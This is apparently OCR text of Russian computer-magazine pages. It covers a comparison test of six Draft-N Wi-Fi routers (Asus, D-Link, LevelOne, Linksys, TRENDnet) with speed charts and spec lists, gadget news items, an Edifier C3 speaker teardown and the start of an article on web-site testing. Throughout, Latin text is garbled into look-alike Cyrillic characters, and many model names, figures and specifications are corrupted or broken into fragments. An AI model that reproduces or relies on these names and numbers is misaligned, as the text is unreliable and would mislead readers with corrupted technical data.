детали засекречены), но все тот же Синофски утверждает, что уже в 
октябре этого года состоится первая презентация ѴѴіпсІоѵѵз 7. После 
нее и наполнение блога станет обширнее. Напомню, что релиз системы 
намеченнаначало2010 года. 





НР^А$ЕК^ЕТ Р1005 

МИНИАТЮРНЫЙ 

СПРИНТЕР. 



Для дома и офиса выбирайте 
быстрый, надёжный и компактный 
принтер НР 1а$ег|е^ Р1005 
по доступной цене! 




НР Іазегіе» Р1005 

• Скорость печати: ДО 14 стр./мин. 

• Нагрузка: до 5 000 страниц (А4) в месяц 

• Время выхода первой страницы: менее 9 сек. 
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■Геггит 




ИГОРЬ ФЕДЮКИН 



ТЕСТ ОРАРТ N 
ѴѴІ-РІ РОУТЕРОВ 



«ЧЕРНОВЫЕ НОВИНКИ»ѴѴІ-РІ 



Списокпр отестированного 

^И^^^Иобор^ования: 



А5и5ѴѴІ-500ѴѴ 

Азизкт-міі 

О-ЫпкОІК-655 

ІеѵеЮпеѴѴВК-6000 

ЫпкзузѴѴВТІбОМ 

ТВЕМОпеіТЕѴѴ-бЗЗОВ 



В этом тесте мы рассмотрим наиболее интересные и актуальные модели РгайМ] 
роутеров от ведущих производителей. 



в МЕТОДИКА ТЕСТИРОВАНИЯ 

Для тестирования проводного сегмента использовался скрипт передачи 
пакетов максимального размера. 

1 . При тестировании пропускной способности ѴѴАМ ЕАМ одна из стан- 
ций подключалась кодному из портов свитча (интерфейс ЕАМ), вторая 
— кѴѴАМ-порту. В итоге, мы получали пиковую пропускную способность 
для ѴѴАМ-интерфейса (также ее можно называть скоростью МАТ). Из- 
меряласьскорость однонаправленной передачи (направления ѴѴАМ 
ЕАМ и ЕАМ ѴѴАМ) и в режиме полного дуплекса (ЕВХ). 

2 . Поскольку при активации интернет-соединения по протоколу РРТР 
создается дополнительная нагрузка на центральный процессор роуте- 
ра, мы измерили пропускную способность РРТР. Для этого за ѴѴАМ-ин- 
терфейсом маршрутизатора был поднятѴРМ-сервер. Также проверя- 
лась возможность установки ѴРМ-соединения в случае размещения 



ѴРМ-сервера вне сегмента нахождения нашего маршрутизатора. 

3 . Для оценки скорости ѴѴі-Еі мы использовали РСМСІА-адаптеры 
А5П5 ѴѴЕ-100ѴѴ, П-Еіпк ОѴѴА-645, ЕеѵеЮпе ѴѴРС-0600 Ь/\л/ѵег.2, Еіпкзуз 
ѴѴРС4400М, ТРЕМОпеІ; ТЕѴѴ-621 РС. Каждый роутер тестировался с 
адаптером того же производителя. Измерения проводились в типич- 
ной квартире из двухточекс разным удалением от роутера. В первом 
случае удаление не превышало 1 метра и измерялась максимальная 
скорость передачи данных. Во втором случае ноутбуке ѴѴіЕі-адаптером 
находился отточки доступа на расстоянии 1 0 метров по диагонали за 
стеной. Во всех случаях использовалась шифрация трафика ѴѴРА-Р5К 
с ключом ТКІР. 

4 . В качестве дополнительного исследования была проведена проверка 
на уязвимости со стороны ѴѴАМ-интерфейса с помощью программного 
продукта ТепаЫе Меззиз. 



СКОРОСТЬ ѴѴІ-РІ (10 МЕТРОВ, МІМРАСКЕТ5І2Е) 


1 


СКОРОСТЬѴѴІ-РІ (1 МЕТР, МІМРАСКЕТ5І2Е) 




■ 





ТРЕМОпеІ 

ТЕѴѴ-бЗЗбР 

ЫпкзузѴѴРТібоМ 

ЕеѵеЮпе 

ѴѴВР-бООО 

О-ЫпкОІР-655 
А505 РТ-М11 
А505ѴѴЕ-500ѴѴ 



0.2 0.4 0.6 



ар-рс 

ЬоФ 

рс-ар 



ТРЕМОпеІ 

ТЕѴѴ-бЗЗбР 

Еіпкзуз ѴѴРТібоМ 

ЕеѵеЮпе 

ѴѴВР-бООО 

0-Еіпк0ІР-б55 
А505 РТ-М11 
А505ѴѴЕ-500ѴѴ 



ар-рс 

ЬоФ 



0.2 0.4 0.6 



В случае удаления на 1 0 метр ов ситуация не меняется, лишьуменьшаН 
ются абсолютные показатели) 



На пакетах минимального размера в лидеры вырывается Р-Еіпк Р1В-| 
І55. Как видно, расстановка сил значительно поменялас^ 



РЕДАКЦИЯ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТАВИ- 
ТЕЛЬСТВАМ КОМПАНИЙ А505р 0-ЫНКр ЫНК5У5р ІЕѴЕІОНЕ И ТЯЕНОНЕТ 



► 016 
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СКОРОСТЬ ѴѴІ-РІ (10 МЕТРОВ, МАХРАСКЕТ5І2Е) 



СКОРОСТЬѴѴІ-РІ (1 МЕТР, МАХРАСКЕТ5І2Е) 



ТКЕМОпеІ 

ТЕѴѴ-бЗЗбР 

ЫпкзузѴѴРТібоМ 

СеѵеІОпе 

ѴѴВР-бооо 

О-ЫпкОІР-655 
А505 РТ-М11 
А505ѴѴЬ500ѴѴ 



10 20 30 40 50 60 70 80 



ар-рс 

Ьо(Ь 

рс-ар 



ТКЕМОпеІ 

ТЕѴѴ-бЗЗбР 

ЫпкзузѴѴКТібоМ 

ІеѵеІОпе 

ѴѴВР-бооо 

О-ЫпкОІР-655 
А505 КТ-М11 
А505ѴѴІ-500ѴѴ 



ар-рс 

ЬоЫі 

рс-ар 



Лидеры по-прежнемуте же, но отставание других участи и ков теста 
чувствуется уже меньше ^ 



3500 руб. 



о 



По максимальной скорости ѴѴі-Рі в лидерах оказались роутеры А51І5 
ѴѴІ-500ѴѴ, О-Ыпк ОІП-655 и ТПЕМОпеіТЕѴѴ-бЗЗбР 



2000 руб. 



А5и5ѴѴІ-500Ѵ\^ 

Технические характеристики: 



Интерфейсы: ІхѴѴАМ (Р^-45)р4x^АN (Р^-45) ю/юо Мбит/сек 

Беспроводнаяточка доступа ѴѴі-Еі: ІЕЕЕ 802.11 Ь/д + ОгаЙМ (до ЗОО 
Мбит/сек) 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5/ТКІР+АЕ5), поддержка РА0Ш5 
Функции роутера: МАТ/МАРТ, ОупОЫБрЗіаІісРоиЫпд, ОНСР 
Функции файрвола: 5РІ, Раске* Ріиег, ІІРЬРіиег, МАС РіИег 
Дополнительно: 2 У5В 2.0 порта для подключения У5В-драйвов, 
видеокамер и т.п. 






5У5 РТ-М11 

Технические характеристики: 



Интерфейсы : ІхѴѴАМ (Р^-45)р 4хЬАМ (Р^-45) ю/юо Мбит/сек 

Беспроводная точка доступа ѴѴі-Еі: ІЕЕЕ 802.11 Ь/д + ВгаЙ N (до ЗОО 
Мбит/сек) 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5/ТКІР+АЕ5), поддержка РА0Ш5 
Функции роутера: МАТ/МАРТ, 0уп0М5,5іаІісРоиЫпд, ВНСР 
Функции файрвола: 5РІ, Раскеі Ріііег, ІІРЬ РіИег, МАС РКіег 

Дополнительно: ѴѴР5 



0 0 0 0 



Название этого роутера уже не раз мелькало на страницах нашего 
журнала. Долгое время ѴѴЕ-500ѴѴ был единственной моделью с подде- 
ржкой 0га б; N отА5Н5 и, по сути, являлся одним из лучших ЕіЬегпеІ:- 
роутеров. Среди самых существенных его достоинств — использование 
открытого кода прошивки на базе *піх-системы. Это способствовало 
притоку сторонних разработчиков микрокода, улучшавших функцио- 
нальность. В альтернативной прошивке появилась возможность задать 
ѴРМ-сервера хостнеймом, корректно заработала функция статической 
маршрутизации в случае двух соединений на ѴѴАМ-интерфейсе, атакже 
роутер научился принимать маршруты с ОНСР-сервера. Помимо этого 
добавилась функция работы с тиШсазІ-потоками для их просмотра за 
роутером. Сейчас многие из этих функций реализованы в оригинальной 
прошивке, однако, благодаря альтернативному микрокоду, роутер од- 
ним из первых получил возможность полноценного функционирования 
в российских ЕіЬегпеІ-сетях. Из дополнительных функций устройства 
стоит отметить наличие двух СЭВ-портов, ккоторым можно подключить 
принтер, С5В флеш-драйв или веб-камеру. По скорости маршрутизации 
в режиме МАТ и ѴѴі-Еі девайс находится среди лидеровтеста! 

Пожалуй, единственный, но достаточно весомый недостаток роутера 
— низкая скорость интернет-соединения при использовании РРТР/ 
Е2ТР. В лучшем случае она составляет около 20 Мбит/сек. 



Новинка отАЭСЭ, которая, возможно, призвана сменить на посту А5СІ5 
ѴѴЕ-500ѴѴ. Данная модель еще не попала в продажу, и у нас в руках был 
лишь сэмпловый экземпляр. Девайс представляет собой 10/100 Мбит/ 
сек роутер с встроенным 4-портовым коммутатором и точкой доступа 
□ гаО: N. Сейчас прошивка устройства активно дорабатывается разра- 
ботчиками с целью корректной работы в российских ЕіЬегпеІ-сетях. 

В последней версии была реализована корректная работа протокола 
Е2ТР и статических маршрутов. Стоит сказать, что ѴРМ-сервертут, каки в 
ѴѴЕ-500ѴѴ, можно задать хостнеймом. Из дополнительных опций отметим 
функции Мииі-55Ю и ѴІР 2опе. Первая служит для создания несколь- 
ких идентификаторов 55Ю с разными параметрами безопасности для 
одной и той же радиосети. А вторая — для выделения полосы пропус- 
кания между разными ѴЕАМ’ами, ккоторым привязывается конкретное 
55Ю. Можно нетолько создать несколько 5510 с разными параметрами 
безопасности, но и выделить под каждый из них свою полосу пропуска- 
ния. К слову: девайс продемонстрировал вполне приличную скорость 
МАТ-маршрутизации и довольно высокую производительность ѴѴіЕі- 
соединения. 

В процессе тестирования возникли небольшие проблемы с 
установлением связи по протоколу РРТР и безумно не хватало 
поддержки функции ІбМРЭпооріпддля возможности просмотра 
тииісазі-потоков. 
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ПРОПУСКНАЯ СПОСОБНОСТЬ РРТР 
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На ѴѴАМ-интерфейсе создавалось РРТР-соединение. Отсюда и допол-] 
цительная награрзка на СРЦ роугера| 



V. 



I \ 



о 




3300 руб. 




О-ЫпкОІР-655 

Технические характеристики: 




Интерфейсы: ІХѴѴАМ (Р^-45) 10/100/1000 Мбит/сек, 4хІАМ (Р^“45) 
іо/іоо/іооо Мбит/сек 

Беспроводная точка доступа ѴѴі-Рі: ІЕЕЕ 802.11 Ь/д + ОгаЙМ (до ЗОО 
Мбит/сек) 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), поддержка РА0Ш5 

Функции роутера: МАТ/МАРТ, ОупОЫЗ, ОНСР, Зіаііс РоиЫпд, 0о5 Епдіпе 
Функции файрвола: 5РІ, ІІРЬРіиег, ІР/МАСРіиег, АссеззСопІгоІ 

Дополнительно: ѴѴР5 



2300 руб. 



Топовый продукт от 0-Біпк, некоторое время доводившийся до ума, с 
последней прошивкой (1 .12ѴѴѴѴ Виіісі 04) является главным конкурентом 
АБНБ ѴѴБ-500ѴѴ. Какиеже козыри в рукаху О-Ыпк? Во-первых, полно- 
ценная работа в ЕОзегпеІ-сетях, требующих создания двух соединений. 
Не забыли и про возможность указания хостнейма ѴРМ-сервера. Нали- 
чие функции І6МР Бпооріпд позволяет просматривать тиШсазІ-потоки 
на устройствах, находящихся за роутером. На высоте и скоростные 
характеристики. Как и подобаеттоповому продукту, роутер оснащен 
гигабитным коммутатором. Болеетого, ѴѴАМ- порт также гигабитный. 
Скорость МАТ-маршрутизации из ѴѴАМ-сегмента составляетсвыше 250 
Мбит/сек. Скорость интернет-соединения при использовании протоко- 
ла РРТР — на уровне 95 Мбит/сек. По скорости беспроводного соеди- 
нения В-Ыпк 01 Р-655 также за ни мает лидирующее положение. Есть 
тут и СБВ-порт, однако он может использоваться только для загрузки 
ѴѴСМ-профилей с флешки (служат для упрощения процесса настройки 
беспроводного соединения). Роутер поддерживает функцию ѴѴР5 (ѴѴі-Еі 
Ргоіесіеб Беіир), которая вообще сведет сложность к минимуму. 

Не обошлось и без минусов. Номер один — некорректная работа со 
статическими маршрутами и невозможность их приема с ВНСР-серве- 
ра. В процессе тестирования былотакже замечено, что при большом 
количестве МАТ-сессий и высокой скорости передачи данных из/в 
ѴѴАМ-сегмент роутер разрывает РРТР-сессию. 



ЬеѵеІОпе ѴѴВР-бооо 

Технические характеристики: 



Интерфейсы: 1xVVАN(Р^-45)10/100 Мбит/сек, 4хЬАМ (Р^-45) ю/юо 
Мбит/сек 

Беспроводная точка доступа ѴѴі-Еі: ІЕЕЕ 802.11 Ь/д + N (до ЗОО 

Мбит/сек) 

Безопасность: ѴѴЕР (до 25 б бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), поддержка РА0Ш5 

Функции роутера: МАТ/МАРТ, ОупОМЗ, ОНСР, 5іаЫсРоиЫпд,ѴѴММ, 0о5 
Функции файрвола : 5РІ, ограничение доступа по ІІРЬ/КеуѵѵогсІ/ 
АррІісаЫоп 

Дополнительно: ѴѴР5 



ООО 



Новый продукт от ЕеѵеЮпе бьет почти все рекорды по стоимости ВгаІІ 
N роутера. Это самая дешевая модель в нашем тесте и одна из самых 
дешевых на рынке в принципе. Что же мы получаем за свои деньги? 
Достаточно производительный девайс, скорость МАТ которого состав- 
ляет порядка 90 Мбит/сек. В случае использования протокола РРТР- 
соединения скорость маршрутизации снизится до ~40 Мбит/сек. 
Вполне достаточно для большинства пользователей. Скорость бес- 
проводного соединения — хоть и ниже, чем у многих других моделей, 
но все равно остается на достаточно высоком уровне. Отсюда вывод: 
нетребовательным кфункциональности юзерам, желающим получить 
ВгаІІ: N роутер по максимально низкой цене, — ЕеѵеЮпе ѴѴВР-6000 
придется по душе. 

Перед покупкой, прежде всего, стоит внимательно отнестись каппарат- 
ной версии роутера и адаптеров, так как присланные нам изначально 
(по ошибке) адаптеры версии 1 .0 показали значительно худшие резуль- 
таты. К недостаткам роутера также относится невозможность указания 
адреса ѴРМ-сервера в виде хостнейма, некорректная работа статичес- 
кой маршрутизации, отсутствие функции ІОМР Эпооріпд. 
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ООО «Сеннхайзер Аудио» 
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Тел.: (495)^29 37 01 , факс: (495) 229 37 02 
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ПРОПУСКНАЯ СПОСОБНОСТЬ МАТ 
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На графике представлена пропускная способность ѴѴАМ-интерфейса] 
в режиме МАТ втрех направлен иях: НАМ ѴѴАМ, ѴѴАМ НАМ и приР 
Одновременной передаче (РРХ]| 




Интерфейсы: ІХѴѴАМ (Р^-45) ю/юо Мбит/сек, 4хЬАМ (Р^-45) ю/юо 
Мбит/сек 



Беспроводная точка доступа ѴѴі-Рі: ІЕЕЕ 802.11 Ь/д + ОгаЙ N (до ЗОО 
Мбит/сек). 

Безопасность: ѴѴЕР (до 256 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), поддержка РА0Ш5 

Функции роутера : МАТ/МАРТ, ОупОМЗ, ОНСР, 5*а*іс Роиііпд, ѴѴММ, 0о5 
Функции файрвола: 5РІ, ограничение доступа по ІІРЬ/КеуѵѵогсІ/ 
Арріісаііоп 

Дополнительно: ѴѴР5 



ООО 



Если бы у нас была награда за самый оригинальный дизайн, ее бы по 
праву заслужил ЫпкзузѴѴРТІбОМ. Смотри сам, внешний виддевайса 
сильно выделяется на фоне конкурентов. При этом роутер построен 
натомже чипсете, что и А5С5ѴѴЕ-500ѴѴ. Логично, что пропускная 
способность МАТ находится на уровне 75 Мбит/сек. Ну а по скорости 
беспроводного соединения Ыпкзуз ѴѴНТ160М уверенно держится среди 
середнячков (для упрощения процесса настройки роутер поддерживает 
функцию ѴѴР5). 

А вот скорость интернет-соединения при использовании протокола 
РРТР всего 8 Мбит/сек. Учитывая, что в А5С5 ѴѴЕ-500ѴѴ, благодаря 
дополнительным параметрам, удалось добиться пропускной спо- 
собности в 20 Мбит/сек, допускаем, что в Ыпкзуз ѴѴРТ160М это также 
возможно. 




ТРЕЫОпеІ 



4100 



ТЕѴѴ-бЗЗСГ^^Ц 

Технические характеристики^ 



И нтерфейсы : ІхѴѴАМ (Р^-45) 10/100/1000 Мбит/сек, 4х1АМ (Р^-45) 
ю/юо/1 ООО Мбит/сек 

Беспроводная точка доступа ѴѴі-Рі: ІЕЕЕ 802.11 Ь/д + N (до ЗОО 

Мбит/сек) 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), поддержка РА0Ш5 

Функции роутера: МАТ/МАРТ, ОупОМЗ, ОНСР, 5іаЫс РоиЫпд, ТгаЖс 
ЗЬаріпд 

Функции файрвола: 5РІ, Раске* Ріиегіпд, Оотаіп/ІІРЬ Ріиегіпд, МАС 
Ріиегіпд 

Дополнительно: 5*геатЕпдіпе,ѴѴР5 

••••••••00 

ТРЕМОпеіТЕѴѴ-бЗЗОР, также, каки О-Ыпк ОІР-655 — полностью гигабит- 
ный роутер. Это означает, что все его порты, включая ѴѴАМ — гигабитные. 
Пока Еібегпеі-провайдеры не подключают пользователей на таких скоро- 
стях, но никогда не вредно иметь запас на будущее. Производительность 
МАТу роутера находится на высочайшем уровне и составляет порядка 
300 Мбит/сек. При установке интернет-соединения с использованием 
протокола РРТР можно рассчитывать на 80-90 Мбит/сек. Для упрощения 
процесса настройки ѴѴіЕі-соединения роутер поддерживаетѴѴРЭ. 

Со скоростью ѴѴІ-РІ уданного роутера все в порядке. Она находится на 
уровне 60-70 Мбит/сек. Из дополнительных опций присутствует функция 
автоматической классификации трафика и возможность работы с 
тиШсазІ-потоками (благодаря поддержке ІбМРЭпооріпд). 

Из-за некорректной маршрутизации двух соединений на ѴѴАМ-интер- 
фейсе просмотр тиШсазІ-потоков невозможен при активном РРТР- 
коннекте. Нет и возможности ввести ѴРМ-сервера в виде хостнейма. 
При активации функции ЭігеаппЕпдіпе был замечен баг со сниже- 
нием пропускной способности ѴѴАМ ЕАМ до 2,8 Мбит/сек. Однако 
инженеры ТРЕМ Ппеі: активно работают над устранением программных 
недоработок. 



Н ВЫВОДЫ 

Подробно рассмотрев шесть домашних роутеров, пора подводить 
итоги. Во-первых, сканирование на предмет наличия уязвимостей не 
выявило ни одного серьезного изъяна в безопасности тестируемых 
устройств. Во-вторых, хорошо прослеживается тенденция адапта- 
ции вендорами своих продуктов к полноценной работе в российских 
ЕіЬегпеІ:- сетях. Наиболее сбалансированным в плане скорости и 



функциональных возможностей, на наш взгляд, оказался А5П 5 ѴѴЕ- 
500ѴѴ. Он получает приз «Выбор редакции». Впрочем, В-ЕіпкВІВ-655 
— тоже весьма хорош. Ну, а с точки зрения цены и качества вперед, 
несомненно, вырвался ЕеѵеЮпе ѴѴВВ-6000 (за что и получает приз 
«Лучшая покупка»). Еще бы доработать его с точки зрения функцио- 
нальности! Что ж, награды вручены, прощаемся с вами, но ненадол- 
го. Ждите новых обзоров! ^ 
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РЕНИЕ ВРЕДИИАШЕМУ ЗДОРОВЬЮ 




■Геггит 



4девайса= 




8опуР8Р-3000 

Новая модификация 
сверхпопулярной 
карманной консоли 



Компания 5опу официально представила новую версию консоли 5опу 
Р5Р, которая получила название Р5Р-3000. Точной информации о 
технических характеристиках пока нет, но старый дисплей точно будет 
заменен новым - с более высокой контрастностью, меньшим време- 
нем отклика и с более насыщенной гаммой цветов. Также сообщается 
о встроенном микрофоне для разговоров по Зкуре. В комплекте будет 
поставляться фирменная карта памяти Метогу 5бск РРО Оио объемом 4 
гигабайта. Европейский релиз назначен на 1 5 октября. Каких-то особых 
изменений ждать не стоит. Можно предположить, что процессор будет 
немного быстрее и добавится оперативной памяти. Но вряд ли 5опу 
бросит уже купивших консоль геймеров на произвол судьбы. Новые игры 
все равно будутзаточены под выпущенные ранее модели. Весьма веро- 
ятно, что усложнилась система защиты от взлома. Поэтомулюбителям на 
халяву поиграть в скачанные из Сети игрушки придется... подождать вы- 
хода новой прошивки :). В общем, небольшие косметические изменения 
и приятная цена. Продолжаем ждать Р5Р2. 



Сиппаг Ор1;ік8 

Для любителей подолгу 
глядеть в монитор 



$99-189 



[Купить; Шр;/Мѵѵѵѵ.диппагор1ік5.сот| 



Постоянное сидение перед монитором плохо сказывается на зрении. Это 
знает, наверное, каждый. Чтобы избежатьтак называемого «синдро- 
ма компьютерного зрения» нужно делать специальные упражнения 
и периодически снимать напряжение с глаз, смотря на горизонт. Но 
многиезабываютэто делать, увлекшисьработой илижестким геймин- 
гом. Поэтому хорошо, что компания Сиппаг О рб кв выпускает специаль- 
ные очки, предназначенные для снятия напряжения глазных мышц. 

Очки оснащены фирменными линзами і-АМР. Также на стекла нанесено 
антибликовое покрытие, и они имеютспециальную форму, создающую 
благоприятный для глаз микроклимат и защищают их от пересыхания. 
Линзы фильтруют свет, который находится в неоптимальном спектре для 
человеческого глаза. Мы не можем ручаться, что описанные достоинс- 
тва - не рекламная уловка. Что ж... если зрению очки не помогут, то хотя 
бы позволят создать геймеру более внушительный и серьезный вид во 
время сетевых баталий. 
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А81І8 ЕееВох 

Продолжение 
стильной серии 



от $ 350 



Этот компьютер продолжает серию компактных и стильных ноутбуков Еее 
РС. И да, он тоже компактный и стильный. Внутри находится процессор 
Іпіеі АЬт частотой 1 ,6 ГГц, 1 Гб памяти и жесткий дискобъемом 80 Гб. 
Также имеется встроенный модульѴѴі-Рі и кардридер. В комплекте идет 
ѴѴіпбоѵѵзХР Ноте. Таких характеристик машинке вполне достаточно, 
чтобы стать домашним центром развлечений. Или можно настроить ко- 
робку как роутер и раздавать беспроводной интернет по всей квартире, 
по ночам скачивая фильмы изторрентов (уже скачанные фильмы можно 
посмотреть на подключенномтелевизоре — жальтолько, что НВМІ- 
выхода не предусмотрено). Разработчики божатся, что уровень шума 
работающего ноутбука составляет 26 дБ, итишину вдомеон не потрево- 
жит. Также обещается технология Ехргезз баіе, которая позволяет компу 
загружаться всего за 7 секунд. Правда, тогда будут доступны только 
браузер, ІМ-чат, менеджер фотографий и Экуре. На выбор предоставле- 
но несколько цветовых решений А5Н5 Еее Вох. Есть сведения о белой, 
черной, желтой и красной моделях. 



ІОСЕАК^і8ѴѴіге1е88 

иЗВІіоѴСАКіІ: 

Набор для тех, у кого 
кабель не дотягивается 
до телевизора 



229.95$ 



Если хочется посмотреть скачанный фильм не на мониторе, а на экране 
телевизора, то придется либо покупать специальное устройство, либо 
тянуть провод через всю комнату. Первый вариантне всем покарману,а 
второй не всегда реализуем из-затого, что длина ѴОА-кабеля ограниче- 
на. Хорошим решением будет набор ІООЕАЕ’з ѴѴігеІезз Н5В Іо ѴОА КіГ Он 
по беспроводной связи передаетсигнал качеством 720р на расстояние 
до 10 метров. Комплект состоит из двух модулей - один по 05В подклю- 
чается к компу, а другой через Ѵ6А- ктелевизору. Это позволит не только 
смотреть фильмы, но и показывать гостям фотки с пьяных отжигов или 
серфить инетна большом экранетелевизора. У комплекта есть один 
недостаток- он может работать только с ѴѴіпсІоѵѵзХР (Эегѵісе Раск 2) или 
Ѵізіа (32-/64-Ьі1:). Волшебный набор получил сертификацию в США и в 
сентябре появится в продаже. О продаже за территорией Штатов пока 
молчат. 
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іп2І(іе 



[СЕРГЕЙ долин] 



ВНУТРИ У ЗВУКА 



РАЗБИРАЕМ НА ЧАСТИ КОМПЛЕКТ КОЛОНОК ЕОІРІЕР СЗ 



Звуковые системы фирмы Есіійег всегда славились высоким качеством 
сборки и хорошо сбалансированным звучанием. Шутка ли: за 5 лет 
активных продаж в России средний процент брака составил всего-навсего 
0.4%, а среди покупателей продукции Есіійег практически не встречаются 
недовольные. Тем интереснее было разобрать на части новую акустичес- 
кую систему ЕсШ^іег СЗ. 
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На всех платах внутри блока 
управления в идны следы Д 
ручной пайки^^^^НІ^І 



Сателлиты оборудованы двумя 
динамиками: шелковым высоко- 
частотным твиттером диаметром 13 
мм и широкополосным динами- 
ком с бумажным диффузором 
диаметром 3.5 дюйма, берущим на 
себя воспроизведение основного 
частотного диапазона. 

Внутри колонки расположена 
стандартная обкладка из мягкой 
материи для поглощения звука и 
недопущения собственных вибра- 
ций корпуса. 

Каждый сателлит оборудован двух- 
полосным частотным фильтром 
(кроссовером), представляющим 
собой цепь из катушки с ферромаг- 
нитным сердечником и конденса- 
торов . 



Самая большая, и, по моему 
мнению, самая приятная уху часть 
звуковой системы — сабвуфер. 
Корпус выполнен из МДФ толщи- 
ной около полутора сантиметров, 
а массивный длинноходный 
вуфер с бумажным диффузором 
диаметром 8 дюймов закреплен 
внутри на восьми саморезах. 
Причем, чтобы на хороших басах 
избежать биения и искажения 



звука, эти саморезы залиты спе- 
циальным герметиком. 
Динамиксабвуфера очень 
массивный итрадиционно для 
фирмы Еббегвыполнен очень 
качественно. 



Плата управления собрана поти- 
повой схеме. Есть интеллектуаль- 
ная плата с микроконтроллером, 
которая декодирует сигналы с 
пульта, нажатие клавиш на перед- 
ней панели, а также регистрирует 
положение ручекуправления 
звуком. 

Эти сигналы перерабатываются 
и передаются в платуусилителя. 
Самусилительсобран настандарт- 
ной микросхеме ТОА, и примене- 
ны совершеннотиповые решения, 
которые встречаются практически 
в любой современной технике 
Ні-Еі класса. 

На всех платах встречаются следы 
ручной пайки — впрочем, в этом 
нет ничего зазорного: достаточно 
часто дешевле выполнять какую- 
то работу вручную, чем полностью 
автоматизировать процесс. I 



, ФИЛЬТР СЕТЕВЫ Х ПОМЕХ ТРАНСФОРМАТОР ДЛЯ ПИТАНИЯ 

I ігіЛАТЫ УПРАВЛЕНИЯ И УСИЛКАІ 






ЗВУЧАНИЕ 



Первое, что приходит в голову во время теста ЕбіЕег СЗ - это слово «сба- 
лансированность». Звук воспроизводится четко и без вранья, инстру- 
менты легко узнаваемы и не забиваютдруг друга. 

Сабвуфер выдает приличного уровня басы и вся система демонстри- 
рует отличное звучание и сбалансированную работу даже на большой 
громкости. Отдельный восторг вызвала глубина амплитуды на «низах» 

— в районе 50 Гц. 

Что же касается высоких частот, и тут все хорошо. Благодаря новому 
куполовидномутвитеру из шелка, спад на высоких частотах практически 
отсутствует, что делает звук более четким, жизнерадостным и сочным. 



ІВЫВОДЫІ 



Новая акустическая система ЕбіЕегСЗ порадовала традиционно высо- 
ким качеством динамиков и сбалансированным звучанием. У инже- 
неров компании получилась отличная акустическая система, которая 
украситжизнь почти любого меломана. 
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[АЛЕКСАНДР ЛОЗОВЮІ 



А^ЕК5 



ВАI^ЕN@СМАI^ 



СОМ 



ІЭКЗАМЕ Н] 






ІСоздать са йт просто только, когда речь идет о лох овском сайте-визитке. 
^^^і^^маешься серьезным проектом, 

^^^ть их с макетами страниц — уже недостаточ^^^^^^^^^^^^^^^^ 
[инимум, проверить работу сайта в самых распрост^ненных браузерах и 






^^^^^^^гаакового отображения в 

как же 

взаимодействуют и вообще, — что это за квадратик вон там, в углу? Задача | 



гестирования веб^роекта н^ю^доку^юлш 



в типы ТЕСТИРОВАНИЯ 

Сначала давай разберемся, о каком тестировании идет речь. Если ты опыт- 
ный программист, то при слове «тестирование», вероятно, сразу вспоми- 
наешь о популярном подходе программирования Тезі: Огіѵеп Оеѵеіортепі; 
(разработка через тестирование). Одновременное кодом пишутся так назы- 
ваемые Спіі-тесты, проверяющие, какэтот самый код работает. Во многих 
популярных фреймворках сейчас поумолчанию включены инструменты для 
создания Спіі-тестов, однако, сегодня мы ихтрогать не будем. Поговорим 
отестировании уже существующего продукта. Условно процесс можно 
разделить на несколько этапов: 

• тестирование отображения в разных браузерах; 

• тестирование корректной работы и отладка А^АX, дизайна и процесса 
взаимодействия; 

• нагрузочноетестирование; 

• тестирование интерфейса (изаЬіІіСу); 

• тестирование безопасности (репСезС). 

Разработка интерфейса — это тема для отдельного разговора, а о пен-тесте 
сайтов мы и так пишем каждый номер. Поэтому подробно остановимся 
на первыхтрех пунктах и инструментах, которыетебе пригодятся. Итак, 
поехали! 



г ТЕСТИРОВАНИЕ ДИЗАЙНА 
И ОБЩЕЙ РАБОТЫ САЙТА В РАЗНЫХ БРАУЗЕРАХ 

Твоя задача — сделатьтак, чтобы во всех браузерах все элементы сайта 
отображались одинаково. Не зная вн^ренней кухни, легко подумать, что 
проблема ерундовая. На самом деле, это нота к. Любой современный сайт 
сильно завязан на разных С55-хаках и ^5-скриптаx, и такуж повелось, что 
разные браузеры парсят их по-разному. Опытные верстальщики имеют 
несколько приемов в запасе, и каждый из нихпроводитнемало времени, 
открывая сайтпод разными платформами. В принципе, достаточно ограни- 
читься ОСНОВНЫМИ: 

• Місгозоі'і Іпіегпеі Ехріогег. Каждая из версий 5.5, 6.0, 7.0, — это, фактичес- 
ки, отдельный разговор. 

• Орега.Учти, чтоОрега — кроссплатформенный браузер и тебе стоит пос- 
мотреть, какведетсебя сайтпод разными платформами. Многие пользова- 
тели балдеют от нового бразуера Орега Міпі (дляобычныхтелефоновсОаѵа) 
или Орега МоЬіІе (для смартфонов). 

• Могіііа Ріге^ох. Браузертакже кроссплатформенный, и у разных версий 
своя специфика обработки скриптов. Сейчас существуют несколько 
популярных проектов, построенных на движке Рігеіох — Оеско (например, 
Ріоск, К-Меіеоп, Сатіпо), но единство движка отнюдь не обозначает, что 
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страницы всегда будут отображаться одинаково. 

• Заі'агі. Обязательно проверь этот браузер, родной для 
Мас05, но теперь и с версией для Винды. 

Открывать страницу во всех этих браузерах — довольно 
кропотливая работа, однако, задачу можно упростить. Очень 
полезны виртуальные машины (например, на базе ѴМѵѵаге 
Зегѵег), позволяющие быстро загрузить новую систему. Оамые 
большие сложности возникают при попытке установить на од- 
ной системе несколько браузеров Іпіегпеі: Ехріогег параллель- 
но —таккакон оченьсильно внедряется в систему и поставить 
еще один браузер проблематично. Тебе по может утилита 
ІЕТезІег ( ѵѵѵѵѵѵ.ппѵ-сІеЬидЬаг.сопп/ѵѵікі/ІЕТезІег/НоппеРаде ). Это 
самостоятельный пакет, в котором можно проверить свой сайт 
